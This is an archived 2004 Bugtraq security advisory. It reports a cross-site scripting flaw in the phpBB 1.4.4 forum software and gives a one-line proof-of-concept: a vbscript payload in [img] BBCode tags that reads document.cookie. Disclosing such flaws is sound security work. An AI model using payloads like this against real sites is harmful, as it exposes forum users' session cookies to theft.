[37743] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

CSS in phpBB 1.4.4

daemon@ATHENA.MIT.EDU (SandI])
Wed Dec 15 16:56:24 2004

X-Envelope-From: agent050@sama.ru
X-Envelope-To: <bugtraq@securityfocus.com>
Message-ID: <002f01c4e2db$a8185a60$2fdb9cd5@agent050>
From: "SandI]" <agent050@sama.ru>
To: <bugtraq@securityfocus.com>
Date: Wed, 15 Dec 2004 23:23:55 +0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
Content-Transfer-Encoding: 7bit

I found a bug in quite old forum system phpBB 1.4.4

phpBB 1.4.4 is vulnerable to Cross Site Scripting Attack.

[Vulnerable]

You can put vbscript in [img] bbcode tags.
For example:

[img]vbscript: alert(document.cookie)[/img]

Author: Gurjanov Ilia or Net
agent050@sama.ru

home	help	back	first	fref	pref	prev	next	nref	lref	last	post